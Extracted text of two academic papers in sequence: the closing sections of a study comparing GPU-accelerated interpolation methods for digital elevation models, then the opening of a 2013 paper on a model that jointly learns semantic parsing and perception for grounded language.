interpolated point (the elevation of the DEM at this point), fn is the predicted value of the ith interpolated point, and ei is the relative error of the ith interpolated point. As listed in Tables 8 and 9. For better evaluation of relative error, we also calculated the mean relative error E. The E is defined in Eq. (23) E = ∑Ni i=1ei Ni (23) where Ni is the number of interpolated points. In the flat zone As shown in Fig. 14, for the flat region, when the data points are evenly distributed, the frequency statistical curve of the MLS is the highest when it is close to zero, the lowest when it is far away from zero, and the relative error distribution range is smaller, which means that the error of MLS method is small. The characteristics of the frequency statistical curve of Shepard’s method are completely opposite to those of MLS, which means that the Tu et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.263 21/30 https://peerj.com https://doi.org/10.7717/peerjcs.263/fig-14 http://dx.doi.org/10.7717/peerj-cs.263 Figure 15 Frequency distribution of the Relative Error for the parallel implementation developed on a single GPU in the Rugged zone. (A) Regularly distributed and (B) irregularly distributed. The size of data points: Size 1. Full-size DOI: 10.7717/peerjcs.263/fig-15 Table 8 The algorithm with the highest accuracy in congeneric algorithms and its corresponding mean relative error in the Flat zone. Distribution Mean Relative Error E (%) Original MLS kNNRBF kNNShepard bRegularly- distributed 0.0069 0.0078 0.0084 Lancaster’s MLS kNNRBF kNNAIDWIrregularly- distributed 0.0144 0.0162 0.0148 Table 9 The algorithm with the highest accuracy in congeneric algorithms and its corresponding mean relative error in the Rugged zone. Distribution Mean Relative Error E (%) Original MLS kNNRBF kNNAIDWRegularly- distributed 0.0514 0.0582 0.0904 Lancaster’s MLS kNNRBF kNNAIDWIrregularly- distributed 0.3078 0.3493 0.3703 error of MLS method is large. For the RBF interpolation algorithm, the characteristic of the frequency statistics curve is a transitional phase between those for the MLS and those for Shepard’s method. The above curve features and E (Table 8) illustrate that the interpolation accuracy is from high to low in this condition: the MLS interpolation algorithm, RBF, and Shepard’s interpolation method. When the data points are normally distributed, the relative error distribution ranges of all the interpolation methods are larger than that for the uniformly distributed data points. As shown in Fig. 14, the characteristics of the frequency statistics curve of RBF are obvious, the frequency statistical curve of RBF is above the frequency statistical curves of MLS and Tu et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.263 22/30 https://peerj.com https://doi.org/10.7717/peerjcs.263/fig-15 http://dx.doi.org/10.7717/peerj-cs.263 Shepard’s method, which means that the error of RBF method is larger. The characteristics of frequency statistical curves of MLS and Shepard’s method are very similar, and the relative error distribution range of MLS is the largest. As listed in Table 8, in the flat zone, the accuracy of MLS is slightly higher than Shepard’s method when the data points are normally distributed. In the rugged zone As shown in Fig. 15, for the rugged region, regardless of whether the data points are uniformly distributed or normally distributed, the characteristics of frequency statistical curves of MLS, RBF and Shepard’s method are similar to those illustrated in Fig. 14. However, in Fig. 15B, it is a little different in that most of the frequency statistical curve of Shepard’s method is higher than the RBF’s. As listed in Table 9, the interpolation accuracy is from high to low: the MLS interpolation algorithm, RBF, and Shepard’s interpolation method. According to the above Figures and Tables, some summary conclusions are obtained as follows: For the same region, when the density of data points is almost the same, the interpolation accuracy when the data points are evenly distributed is higher than the interpolation accuracy when the data points are nonuniformly distributed. As listed in Tables 5 and 7, when the data points are evenly distributed, the gap of the accuracy between the three variations of the MLS method, RBF, and Shepard’s interpolation methods increases with the decrease of point density. As shown in Figs. 14 and 15, when the data points are nonuniformly distributed, the maximum relative errors of MLS is larger than other algorithms’, however, MLS method has lower NRMSE and E. A small number of larger relative errors has little effect on the overall interpolation accuracy. A large number of small and medium relative errors are the key to determine the interpolation accuracy of the algorithm. As listed in Table 5, compared with the uniform distribution, when the points are nonuniformly distributed the difference in the accuracy of the interpolation algorithms is not as sensitive to the changes of point density. Compared with the three variations of the MLS method and the RBF method, Shepard’s interpolation method is quite suitable for cases where the data points have a smooth trend. When interpolating for the data points with an undulating trend, the accuracy of Shepard’s interpolation method will be poor. When the density of data points is small, this rule becomes more obvious. Comparison of computational efficiency The parallel implementations developed on multi-GPUs is the most efficient, therefore, the parallel implementations developed on multi-GPUs are discussed below. In the flat zone As illustrated in Fig. 12, for the flat region, except for the kNNRBF, when the number of data points is not much different, the nonuniformly distributed data point set requires Tu et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.263 23/30 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.263 Figure 16 Comparison of the running time cost in the kNN search procedure. (A) Sequential version on single CPU and (B) Parallel version on single GPU. Full-size DOI: 10.7717/peerjcs.263/fig-16 significantly more interpolation time than the uniformly distributed data point set, and with the increase of the number of points, interpolation time does increase as well. As illustrated in Fig. 10, the speedups achieved by the RBF interpolation method is generally small, and its speedups are not much different in various cases. However, when the size of data point set is Size 1 and the data point set is nonuniformly distributed, the speedup of the RBF interpolation method is larger than other methods, which means that the benefits of parallelism are lower in this case. As indicated above, the distribution pattern of data points strongly influences the interpolation efficiency. In the rugged zone As illustrated in Figs. 11 and 13, the running time and the speedups in the rugged region are almost the same as those in the flat region. In other words, the characteristics of the terrain elevation of data points have a weak influence on computational efficiency. Influence of kNN search on computational efficiency According to ‘Methods’ , in the interpolation procedure, the kNN search may affect the entire computational efficiency of interpolation. To specifically evaluate the influence of the kNN search on the computational efficiency of the entire interpolation procedure, we investigated the computational cost of the kNN search for relatively large numbers of data points, i.e., for the dataset of Size 5 (listed in Fig. 16). Note that we employ four sets of data points with Size 5, including (1) the set of uniformly distributed data points and the set of nonuniformly distributed data points in the flat region and (2) the set of uniformly distributed data points and the set of nonuniformly distributed data points in the rugged region. As listed in Table 10, for the sequential version, regardless of whether the data points are uniformly distributed or nonuniformly distributed, the kNN search costs approximately Tu et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.263 24/30 https://peerj.com https://doi.org/10.7717/peerjcs.263/fig-16 http://dx.doi.org/10.7717/peerj-cs.263 Table 10 Proportion of the kNN search time to the running time of the sequential implementations. The proportion is TkNNTrun × 100%, where TkNN is the kNN search time, and Trun is the running time of the corresponding sequential implementations. Data set Original MLS Orthogonal MLS Lancaster’s MLS kNN RBF kNN AIDW kNN IDW kNN shepard1 kNN shepard2 Regularly-distributed 74.9% 78.4% 73.0% 28.7% 77.1% 96.4% 90.8% 92.4% Flat zone Irregularly-distributed 72.8% 76.0% 70.8% 26.8% 75.1% 95.5% 89.7% 90.9% Regularly-distributed 73.7% 77.2% 72.0% 28.3% 76.2% 95.3% 89.7% 91.0%Rugged zone Irregularly-distributed 73.0% 76.2% 71.2% 26.9% 75.3% 95.6% 90.0% 91.1% Table 11 Proportion of the kNN search time to the running time of the parallel implementations developed on a single GPU. The proportion is TkNN Trun ×100%, where TkNN is the kNN search time, and Trun is the running time of the corresponding parallel implementations. Data set Original MLS Orthogonal MLS Lancaster’s MLS kNN RBF kNN AIDW kNN IDW kNN shepard1 kNN shepard2 Regularly-distributed 46.2% 41.3% 44.3% 6.3% 54.6% 65.0% 63.1% 62.0% Flat zone Irregularly-distributed 67.8% 66.8% 68.3% 23.1% 69.5% 71.0% 70.3% 70.4% Regularly-distributed 45.8% 41.2% 44.4% 6.3% 54.6% 65.3% 62.5% 63.3%Rugged zone Irregularly-distributed 68.7% 67.4% 69.0% 22.0% 70.5% 72.3% 71.4% 71.7% 75% of the computational time of the entire interpolation procedure for the three variations of the MLS interpolation algorithm and the AIDW interpolation algorithm, whereas the kNN search costs less than 30% of the computational time for the RBF interpolation algorithm and approximately 90% in the other three variations of Shepard’s method. It should also be noted that for the same size of data points, whether they are uniformly or nonuniformly distributed, there is no significant difference in the computational cost of the kNN search; that is, the distribution pattern of data points is of weak influence on the computational efficiency of the kNN search in the sequential version. As listed in Table 11, for the parallel version developed on a single GPU, when the sizes of data points are almost the same, it would cost much more time in the kNN search when the data points are nonuniformly distributed than when the data points are uniformly distributed. Moreover, when the data points are nonuniformly distributed, the proportion of the kNN search time to the total time is approximately 10% to 20% more than the proportion when the data points are uniformly distributed under the same conditions. On the GPU, for the same interpolation method and the same data size, the proportion of the kNN search time relative to the total time when the data points are nonuniformly distributed is larger than that when the data points are uniformly distributed, and the achieved speedups are small. However, on the CPU, the proportion of kNN search time when the data points are nonuniformly distributed relative to the total time is similar to that when the data points are uniformly distributed, and the achieved speedups are similar. This is because there are a large number of logical operations, such as switches in the kNN search, and the GPU is inherently not as suitable for performing logical operations as the CPU. In the kNN search procedure, the number of points in the search range is slightly smaller than k after determining a certain level. After the level is expanded, the number Tu et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.263 25/30 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.263 of points in the search range will be more than k. In this case, the k nearest neighbors should be selected and the redundant neighbors should be ignored by first sorting and then discarding. Unfortunately, there are a large number of logical operations in sorting. In this procedure of sorting and discarding, when the point density is intensive in a region, the number of found nearest neighbors would be far more than the expected k, and much computational time would thus be required to sort the found neighbors. For areas with sparse data points, it takes more time to find enough k points by expanding the region level. Therefore, in contrast to a uniform distribution, when the data point set is nonuniformly distributed, the kNN search needs more computational time and its proportion of the total time is also greater. CONCLUSION In this paper, we present the development of the sequential version, the parallel version on a multicore CPU, the parallel version on a many-core GPU, and the parallel version on multi-GPUs for each of the eight variations of the MLS, RBF, and Shepard’s interpolation algorithms. We also evaluated the interpolation accuracy and computational efficiency for the above four versions of each variation when building large-scale DEMs. We have obtained the following observations. (1) The distribution pattern of data points and the landscape conditions strongly influences the interpolation accuracy. The distribution pattern of data points strongly influences the interpolation efficiency, and the landscape conditions have a weak influence on the interpolation efficiency. (2) For the same flat region, when the density of points is large, there is no obvious difference in terms of the interpolation accuracy for all interpolation methods. When the data points are uniformly distributed and the density of points is small, the order of the interpolation accuracy from high to low is: the MLS interpolation algorithm, RBF, and Shepard’s interpolation method. When the data points are nonuniformly distributed and the density of points is small, the order of the interpolation accuracy from high to low is: the MLS interpolation algorithm, Shepard’s interpolation method, and RBF. (3) For the same rugged region, regardless of the density and distribution of the data points, the interpolation accuracy order from high to low is: the MLS interpolation algorithm, RBF, and Shepard’s interpolation method. When the data points are uniformly distributed, the above rules are more obvious than those when data points are nonuniformly distributed. (4) The Shepard’s interpolation method is only suitable for application in cases where the data points have smooth trends. When the data points have uniformly rugged trends, the accuracy of Shepard’s interpolation method is rather unsatisfactory, especially in the case when the density of data points is small. (5) For the same set of data points and interpolation points, the order of computational expense from high to low is: the RBF interpolation method, the MLS algorithm, and Shepard’s method Moreover, for the same size of data points and interpolation points, the computational efficiency in the case when the data points are nonuniformly distributed is worse than when the data points are uniformly distributed. Tu et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.263 26/30 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.263 (6) For the same interpolation method, the impact of kNN search on the computational efficiency of the CPU versions and the GPU versions is different. Specifically, the percentage of the computational time of kNN search relative to the computational time of the entire interpolation procedure in the CPU versions is much smaller than in the GPU versions. ACKNOWLEDGEMENTS The authors would like to thank the editor and reviewers for their contributions to the paper. ADDITIONAL INFORMATION AND DECLARATIONS Funding This research was supported by the Natural Science Foundation of China (Grant Numbers 11602235 and 41772326), and the Fundamental Research Funds for the Central Universities (Grant Numbers 2652018097, 2652018107, and 2652018109). The funders had no role in study design, data collection and analysis, decision to publish, or preparation of the manuscript. Grant Disclosures The following grant information was disclosed by the authors: Natural Science Foundation of China: 11602235, 41772326. Fundamental Research Funds for the Central Universities: 2652018097, 2652018107, 2652018109. Competing Interests Gang Mei is an Academic Editor for PeerJ Computer Science. Author Contributions • Jingzhi Tu conceived and designed the experiments, performed the experiments, performed the computation work, prepared figures and/or tables, and approved the final draft. • Guoxiang Yang analyzed the data, prepared figures and/or tables, authored or reviewed drafts of the paper, and approved the final draft. • Pian Qi analyzed the data, prepared figures and/or tables, and approved the final draft. • Zengyu Ding performed the experiments, performed the computation work, prepared figures and/or tables, and approved the final draft. • Gang Mei conceived and designed the experiments, analyzed the data, prepared figures and/or tables, authored or reviewed drafts of the paper, and approved the final draft. Data Availability The following information was supplied regarding data availability: The raw measurements are available in the Supplementary Files. Tu et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.263 27/30 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.263#supplemental-information http://dx.doi.org/10.7717/peerj-cs.263 Supplemental Information Supplemental information for this article can be found online at http://dx.doi.org/10.7717/ peerj-cs.263#supplemental-information. REFERENCES Aguilar FJ, Aguera F, Aguilar MA, Carvajal F. 2005. Effects of terrain morphology, sam- pling density, and interpolation methods on grid DEM accuracy. Photogrammetric Engineering and Remote Sensing 71(7):805–816 DOI 10.14358/pers.71.7.805. Box GEP, Muller ME. 1958. A note on the generation of random normal deviates. Annals of Mathematical Statistics 29(2):610–611 DOI 10.1214/aoms/1177706645. Chaplot V, Darboux F, Bourennane H, Leguedois S, Silvera N, Phachomphon K. 2006. Accuracy of interpolation techniques for the derivation of digital elevation models in relation to landform types and data density. Geomorphology 77(1–2):126–141 DOI 10.1016/j.geomorph.2005.12.010. Chen Z, Shen L, Zhao Y, Yang C. 2010. Parallel algorithm for real-time contouring from grid DEM on modern GPUs. Science China-Technological Sciences 53:33–37 DOI 10.1007/s11431-010-3210-6. Cheng T. 2013. Accelerating universal Kriging interpolation algorithm using CUDA- enabled GPU. Computers & Geosciences 54:178–183 DOI 10.1016/j.cageo.2012.11.013. Coll N, Guerrieri M. 2017. Parallel constrained Delaunay triangulation on the GPU. International Journal of Geographical Information Science 31(7):1467–1484 DOI 10.1080/13658816.2017.1300804. Cover T, Hart P. 1967. Nearest neighbor pattern classification. Information Theory, IEEE Transactions on 13(1):21–27 DOI 10.1109/TIT.1967.1053964. Ding Z, Mei G, Cuomo S, Tian H, Xu N. 2018a. Accelerating multi-dimensional inter- polation using moving least-squares on the GPU. Concurrency and Computation- Practice & Experience 30(24):e4904 DOI 10.1002/cpe.4904. Ding Z, Mei G, Cuomo S, Xu N, Tian H. 2018b. Performance evaluation of GPU- accelerated spatial interpolation using radial basis functions for building ex- plicit surfaces. International Journal of Parallel Programming 46(5):963–991 DOI 10.1007/s10766-017-0533-6. Ebdon D. 1985. Statistics in Geography. 2nd edition. Hoboken: Blackwell Publishing. Ghandehari M, Buttenfield BP, Farmer CJQ. 2019. Comparing the accuracy of esti- mated terrain elevations across spatial resolution. International Journal of Remote Sensing 40:5025–5049 DOI 10.1080/01431161.2019.1577581. Guan Q, Shi X, Huang M, Lai C. 2016. A hybrid parallel cellular automata model for urban growth simulation over GPU/CPU heterogeneous architectures. International Journal of Geographical Information Science 30(3):494–514 DOI 10.1080/13658816.2015.1039538. Gumus K, Sen A. 2013. Comparison of spatial interpolation methods and multi-layer neural networks for different point distributions on a digital elevation model. Geodetski Vestnik 57(3):523–543 DOI 10.15292/geodetski-vestnik.2013.03.523-543. Tu et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.263 28/30 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.263#supplemental-information http://dx.doi.org/10.7717/peerj-cs.263#supplemental-information http://dx.doi.org/10.14358/pers.71.7.805 http://dx.doi.org/10.1214/aoms/1177706645 http://dx.doi.org/10.1016/j.geomorph.2005.12.010 http://dx.doi.org/10.1007/s11431-010-3210-6 http://dx.doi.org/10.1016/j.cageo.2012.11.013 http://dx.doi.org/10.1080/13658816.2017.1300804 http://dx.doi.org/10.1109/TIT.1967.1053964 http://dx.doi.org/10.1002/cpe.4904 http://dx.doi.org/10.1007/s10766-017-0533-6 http://dx.doi.org/10.1080/01431161.2019.1577581 http://dx.doi.org/10.1080/13658816.2015.1039538 http://dx.doi.org/10.15292/geodetski-vestnik.2013.03.523-543 http://dx.doi.org/10.7717/peerj-cs.263 Khairnar HD, Shingare PS, Kale S, Ieee. 2015. Accuracy evaluation of Cartosat-1 DEM using different interpolation techniques for pune area. In: 2015 international conference on industrial instrumentation and control. 203–206. Krige DG. 1953. A statistical approach to some basic mine valuation problems on the witwatersrand. OR 4(1):18–18. Lancaster P, Salkauskas K. 1981. Surfaces generated by moving least squares methods. Mathematics of Computation 37(155):141–158 DOI 10.1090/S0025-5718-1981-0616367-1. Lehmer DH. 1949. Mathematical methods in large-scale computing units. In: Proc. of 2nd Symp. on large-scale digital calculating machinery, vol. 26. 141–146. Lei W, Xiong R, Ma S, Liang L, Ieee. 2011. GPU based fast algorithm for tanner graph based image interpolation. In: IEEE international workshop on multimedia signal processing. Lu GY, Wong DW. 2008. An adaptive inverse-distance weighting spatial interpolation technique. Computers and Geosciences 34(9):1044–1055 DOI 10.1016/j.cageo.2007.07.010. Mallet JL. 1997. Discrete modeling for natural objects. Mathematical Geology 29(2):199–219 DOI 10.1007/bf02769628. Mei G. 2014. Evaluating the power of GPU acceleration for IDW interpolation algorithm. Scientific World Journal 2014: Article ID 171574 DOI 10.1155/2014/171574. Mei G, Tian H. 2016. Impact of data layouts on the efficiency of GPU-accelerated IDW interpolation. SpringerPlus 5(1):104 DOI 10.1186/s40064-016-1731-6. Mei G, Xu L, Xu N. 2017. Accelerating adaptive inverse distance weighting interpola- tion algorithm on a graphics processing unit. Royal Society Open Science 4:1–22 DOI 10.1098/rsos.170436. Mei G, Xu N, Xu L. 2016. Improving GPU-accelerated adaptive IDW interpolation algo- rithm using fast kNN search. Springerplus 5:1389 DOI 10.1186/s40064-016-3035-2. Peng X, Wu Q, Cai Y, Lou L, Yu Y, Li Q. 2019. The application of radial basis function interpolation in reactor core power distribution on-line monitoring. Annals of Nuclear Energy 132:752–762 DOI 10.1016/j.anucene.2019.06.059. Polat N, Uysal M, Toprak AS. 2015. An investigation of DEM generation process based on LiDAR data filtering, decimation, and interpolation methods for an urban area. Measurement 75:50–56 DOI 10.1016/j.measurement.2015.08.008. Powell MJD. 1977. Restart procedures for the conjugate gradient method. Mathematical Programming 12(1):241–254 DOI 10.1007/BF01593790. Rishikeshan CA, Katiyar SK, Mahesh VNV, Ieee. 2014. Detailed evaluation of DEM interpolation methods in GIS using DGPS data. In: 2014 6th international con- ference on computational intelligence and communication networks. 666–671 DOI 10.1109/cicn.2014.148. Shepard D. 1968. A two-dimensional interpolation function for irregularly-spaced data. In: Proceedings of the 1968 ACM national conference. 517–524 DOI 10.1145/800186.810616. Siu-Nganlam N. 1983. Spatial interpolation methods: a review. American Cartographer 10(2):129–150 DOI 10.1559/152304083783914958. Tu et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.263 29/30 https://peerj.com http://dx.doi.org/10.1090/S0025-5718-1981-0616367-1 http://dx.doi.org/10.1016/j.cageo.2007.07.010 http://dx.doi.org/10.1007/bf02769628 http://dx.doi.org/10.1155/2014/171574 http://dx.doi.org/10.1186/s40064-016-1731-6 http://dx.doi.org/10.1098/rsos.170436 http://dx.doi.org/10.1186/s40064-016-3035-2 http://dx.doi.org/10.1016/j.anucene.2019.06.059 http://dx.doi.org/10.1016/j.measurement.2015.08.008 http://dx.doi.org/10.1007/BF01593790 http://dx.doi.org/10.1109/cicn.2014.148 http://dx.doi.org/10.1145/800186.810616 http://dx.doi.org/10.1559/152304083783914958 http://dx.doi.org/10.7717/peerj-cs.263 Steve JL. 2011. Linear algebra with applications. 8th edition. Englewood Cliffs: Prentice Hall. Tan L, Wan G, Li F, Chen X, Du W. 2017. GPU based contouring method on grid DEM data. Computers & Geosciences 105:129–138 DOI 10.1016/j.cageo.2017.05.007. Wang H, Guan X, Wu H. 2017. A hybrid parallel spatial interpolation algorithm for massive lidar point clouds on heterogeneous CPU-GPU systems. Isprs International Journal of Geo-Information 6(11): 363 DOI 10.3390/ijgi6110363. Wasza J, Bauer S, Hornegger J, Ieee. 2011. Real-time preprocessing for dense 3-D range imaging on the GPU: defect interpolation, bilateral temporal averaging and guided filtering. In: 2011 Ieee international conference on computer vision workshops. Watson DF. 1981. Computing the n-dimensional delaunay tessellation with application to voronoi polytopes. Computer Journal 24(2):167–172 DOI 10.1093/comjnl/24.2.167. Wu J, Deng L, Jeon G. 2018. Parallel constrained Delaunay triangulation on the GPU. IEEE Transactions on Industrial Informatics 14:426–436 DOI 10.1109/TII.2017.2724205. Yan C, Liu J, Zhao G, Chen C, Yue T. 2016. A high accuracy surface modeling method based on GPU accelerated multi-grid method. Transactions in Gis 20(6):991–1003 DOI 10.1111/tgis.12224. Yan C, Zhao G, Yue T, Chen C, Liu J, Li H, Su N. 2015. Speeding up the high-accuracy surface modelling method with GPU. Environmental Earth Sciences 74(8):6511–6523 DOI 10.1007/s12665-015-4138-8. Yin K, Sun F, Zhou S, Zhang C. 2014. PAR model SAR image interpolation algorithm on GPU with CUDA. Iete Technical Review 31(4):297–306 DOI 10.1080/02564602.2014.892736. Zhang G, Zhu A, Huang Q. 2017. A GPU-accelerated adaptive kernel density estimation approach for efficient point pattern analysis on spatial big data. International Journal of Geographical Information Science 31(10):1–30. Zhang J. 2013. Research on DEM interpolation algorithm adaptability with local terrain features. In: International conference on geoinformatics. 2013 21st international conference on geoinformatics. Zhou G, Liu X, Fu S, Sun Z. 2017. Parallel identification and filling of depressions in raster digital elevation models. International Journal of Geographical Information Science 31(6):1061–1078 DOI 10.1080/13658816.2016.1262954. Tu et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.263 30/30 https://peerj.com http://dx.doi.org/10.1016/j.cageo.2017.05.007 http://dx.doi.org/10.3390/ijgi6110363 http://dx.doi.org/10.1093/comjnl/24.2.167 http://dx.doi.org/10.1109/TII.2017.2724205 http://dx.doi.org/10.1111/tgis.12224 http://dx.doi.org/10.1007/s12665-015-4138-8 http://dx.doi.org/10.1080/02564602.2014.892736 http://dx.doi.org/10.1080/13658816.2016.1262954 http://dx.doi.org/10.7717/peerj-cs.263 work_jqo6bqehefaodeuuboo6oybjq4 ---- Transactions of the Association for Computational Linguistics, 1 (2013) 193–206. Action Editor: Jason Eisner. Submitted 10/2012; Revised 3/2013; Published 5/2013. c©2013 Association for Computational Linguistics. Jointly Learning to Parse and Perceive: Connecting Natural Language to the Physical World Jayant Krishnamurthy Computer Science Department Carnegie Mellon University jayantk@cs.cmu.edu Thomas Kollar Computer Science Department Carnegie Mellon University tkollar@andrew.cmu.edu Abstract This paper introduces Logical Semantics with Perception (LSP), a model for grounded lan- guage acquisition that learns to map natu- ral language statements to their referents in a physical environment. For example, given an image, LSP can map the statement “blue mug on the table” to the set of image seg- ments showing blue mugs on tables. LSP learns physical representations for both cate- gorical (“blue,” “mug”) and relational (“on”) language, and also learns to compose these representations to produce the referents of en- tire statements. We further introduce a weakly supervised training procedure that estimates LSP’s parameters using annotated referents for entire statements, without annotated ref- erents for individual words or the parse struc- ture of the statement. We perform experiments on two applications: scene understanding and geographical question answering. We find that LSP outperforms existing, less expressive models that cannot represent relational lan- guage. We further find that weakly supervised training is competitive with fully supervised training while requiring significantly less an- notation effort. 1 Introduction Learning the mapping from natural language to physical environments is a central problem for natu- ral language semantics. Understanding this mapping is necessary to enable natural language interactions with robots and other embodied systems. For exam- ple, for an autonomous robot to understand the sen- tence “The blue mug is on the table,” it must be able to identify (1) the objects in its environment corre- sponding to “blue mug” and “table,” and (2) the ob- jects which participate in the spatial relation denoted by “on.” If the robot can successfully identify these objects, it understands the meaning of the sentence. The problem of learning to map from natural lan- guage expressions to their referents in an environ- ment is known as grounded language acquisition. In embodied settings, environments consist of raw sensor data – for example, an environment could be an image collected from a robot’s camera. In such applications, grounded language acquisition has two subproblems: parsing, learning the compositional structure of natural language; and perception, learn- ing the environmental referents of individual words. Acquiring both kinds of knowledge is necessary to understand novel language in novel environments. Unfortunately, perception is often ignored in work on language acquisition. Other variants of grounded language acquisition eliminate the need for percep- tion by assuming access to a logical representation of the environment (Zettlemoyer and Collins, 2005; Wong and Mooney, 2006; Matuszek et al., 2010; Chen and Mooney, 2011; Liang et al., 2011). The existing work which has jointly addressed both pars- ing and perception has significant drawbacks, in- cluding: (1) fully supervised models requiring large amounts of manual annotation and (2) limited se- mantic representations (Kollar et al., 2010; Tellex et al., 2011; Matuszek et al., 2012). This paper introduces Logical Semantics with Perception (LSP), a model for grounded language acquisition that jointly learns to semantically parse language and perceive the world. LSP models a mapping from natural language queries to sets of ob- jects in a real-world environment. The input to LSP is an environment containing objects, such as a seg- 193 (a) An environment containing 4 objects (image segments). Environment: (image on left) Knowledge Base Query: “things to the right of the blue mug” Semantic Parse Grounding: {(2, 1), (3, 1)} Denotation: {2, 3} (b) LSP predicting the environmental referents of a natural language query. Language Denotation The mugs {1, 3} The objects on the table {1, 2, 3} There is an LCD monitor {2} Is the blue mug right {} of the monitor? The monitor is behind {2} the blue cup. (c) Training examples for weakly su- pervised training. Figure 1: LSP applied to scene understanding. Given an environment containing a set of objects (left), and a natural language query, LSP produces a semantic parse, logical knowledge base, grounding and denotation (middle), using only language/denotation pairs (right) for training. mented image (Figure 1a), and a natural language query, such as “the things to the right of the blue mug.” Given these inputs, LSP produces (1) a logi- cal knowledge base describing objects and relation- ships in the environment and (2) a semantic parse of the query capturing its compositional structure. LSP combines these two outputs to produce the query’s grounding, which is the set of object referents of the query’s noun phrases, and its denotation, which is the query’s answer (Figure 1b).1 Weakly supervised training estimates parameters for LSP using queries annotated with their denotations in an environment (Figure 1c). This work has two contributions. The first con- tribution is LSP, which is more expressive than pre- vious models, representing both one-argument cat- egories and two-argument relations over sets of ob- jects in the environment. The second contribution is a weakly supervised training procedure that esti- mates LSP’s parameters without annotated semantic parses, noun phrase/object mappings, or manually- constructed knowledge bases. We perform experiments on two different applica- tions. The first application is scene understanding, where LSP grounds descriptions of images in im- age segments. The second application is geograph- ical question answering, where LSP learns to an- swer questions about locations, represented as poly- gons on a map. In geographical question answering, 1We treat declarative sentences as if they were queries about their subject, e.g., the denotation of “the mug is on the table” is the set of mugs on tables. Typically, the denotation of a sentence is either true or false; our treatment is strictly more general, as a sentence’s denotation is nonempty if and only if the sentence is true. LSP correctly answers 34% more questions than the most comparable state-of-the-art model (Matuszek et al., 2012). In scene understanding, accuracy sim- ilarly improves by 16%. Furthermore, weakly su- pervised training achieves an accuracy within 6% of that achieved by fully supervised training, while re- quiring significantly less annotation effort. 2 Prior Work Logical Semantics with Perception (LSP) is related to work from planning, natural language processing, computer vision and robotics. Much of the related work focuses on interpreting natural language us- ing a fixed formal representation. Some work con- structs integrated systems which execute plans in re- sponse to natural language commands (Winograd, 1970; Hsiao et al., 2003; Roy et al., 2003; Skubic et al., 2004; MacMahon et al., 2006; Levit and Roy, 2007; Kruijff et al., 2007). These systems parse natural language to a formal representation which can be executed using a set of fixed control pro- grams. Similarly, work on semantic parsing learns to map natural language to a given formal repre- sentation. Semantic parsers can be trained using sentences annotated with their formal representation (Zelle and Mooney, 1996; Zettlemoyer and Collins, 2005; Kate and Mooney, 2006; Kwiatkowski et al., 2010) or various less restrictive annotations (Clarke et al., 2010; Liang et al., 2011; Krishnamurthy and Mitchell, 2012). Finally, work on grounded lan- guage acquisition leverages semantic parsing to map from natural language to a formal representation of an environment (Kate and Mooney, 2007; Chen and Mooney, 2008; Shimizu and Haas, 2009; Matuszek 194 Environment d Know. Base Γ mug(1) mug(3) blue(1) table(4) on-rel(1, 4) on-rel(3, 4) ... (a) Perception fper produces a logical knowl- edge base Γ from the environment d using an independent classifier for each category and relation. Language z “blue mug on table” Logical form ` λx.∃y.blue(x) ∧ mug(x) ∧ on-rel(x,y) ∧ table(y) (b) Semantic parsing fprs maps language z to a log- ical form `. Grounding: g = {(1, 4)}, Denotation: γ = {1} {1} {1} blue(x) {1, 3} mug(x) {(1, 4), (3, 4)} {(1, 4), (3, 4)} on-rel(x,y) {4} table(y) (c) Evaluation feval evaluates a logical form ` on a logical knowledge base Γ to produce a grounding g and denotation γ. Figure 2: Overview of Logical Semantics with Perception (LSP). et al., 2010; Dzifcak et al., 2009; Cantrell et al., 2010; Chen and Mooney, 2011). All of this work as- sumes that the formal environment representation is given, while LSP learns to produce this formal rep- resentation from raw sensor input. Most similar to LSP is work on simultaneously understanding natural language and perceiving the environment. This problem has been addressed in the context of robot direction following (Kollar et al., 2010; Tellex et al., 2011) and visual attribute learning (Matuszek et al., 2012). However, this work is less semantically expressive than LSP and trained using more supervision. The G3 model (Kol- lar et al., 2010; Tellex et al., 2011) assumes a one- to-one mapping from noun phrases to entities and is trained using full supervision, while LSP allows one-to-many mappings from noun phrases to entities and can be trained using minimal annotation. Ma- tuszek et al. (2012) learns only one-argument cate- gories (“attributes”) and requires a fully supervised initial training phase. In contrast, LSP models two- argument relations and allows for weakly supervised supervised training throughout. 3 Logical Semantics with Perception Logical Semantics with Perception (LSP) is a model for grounded language acquisition. LSP accepts as input a natural language statement and an environ- ment and outputs the objects in the environment de- noted by the statement. The LSP model has three components: perception, parsing and evaluation (see Figure 2). The perception component constructs logical knowledge bases from low-level feature- based representations of environments. The pars- ing component semantically parses natural language into lambda calculus queries against the constructed knowledge base. Finally, the evaluation compo- nent deterministically executes this query against the knowledge base to produce LSP’s output. The output of LSP can be either a denotation or a grounding. A denotation is the set of entity refer- ents for the phrase as a whole, while a grounding is the set of entity referents for each component of the phrase. The distinction between these two outputs is shown in Figure 1b. In this example, the denotation is the set of “things to the right of the blue mug,” which does not include the blue mug itself. On the other hand, the grounding includes both the refer- ents of “things” and “blue mug.” Only denotations are used during training, so we ignore groundings in the following model description. However, ground- ings are used in our evaluation, as they are a more complete description of the model’s understanding. Formally, LSP is a linear model f that predicts a denotation γ given a natural language statement z in an environment d. As shown in Figure 3, the struc- ture of LSP factors into perception (fper), semantic parsing (fprs) and evaluation (feval) components us- ing several latent variables: f(γ, Γ,`,t,z,d; θ) = fper(Γ,d; θper)+ fprs(`,t,z; θprs) + feval(γ, Γ,`) LSP assumes access to a set of predicates that take either one argument, called categories (c ∈ C) or two arguments, called relations (r ∈ R).2 These predicates are the interface between LSP’s percep- tion and parsing components. The perception func- tion fper takes an environment d and produces a log- 2The set of predicates are derived from our training data. See Section 5.3. 195 γ feval Γd fper ℓ z fprs t Figure 